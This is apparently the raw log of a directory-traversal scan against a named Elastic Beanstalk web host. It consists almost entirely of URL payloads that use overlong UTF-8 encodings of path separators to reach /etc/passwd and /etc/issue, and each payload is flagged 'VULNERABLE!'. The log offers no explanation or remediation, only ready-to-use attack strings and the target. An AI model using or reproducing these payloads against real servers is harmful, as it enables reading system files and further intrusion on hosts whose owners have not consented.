VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259c?.%25c1%259cetc%25c1%259cissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25af?.%25c0%25afetc%25c0%25afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%af?.%f0%80%80%afetc%f0%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afpasswd &lt;- VULNERABLE!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[*] Testing Path: http://teamnebulatest.us-east-1.elasticbeanstalk.com:80/?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%af?.%f8%80%80%80%afetc%f8%80%80%80%afissue &lt;- VULNERABLE!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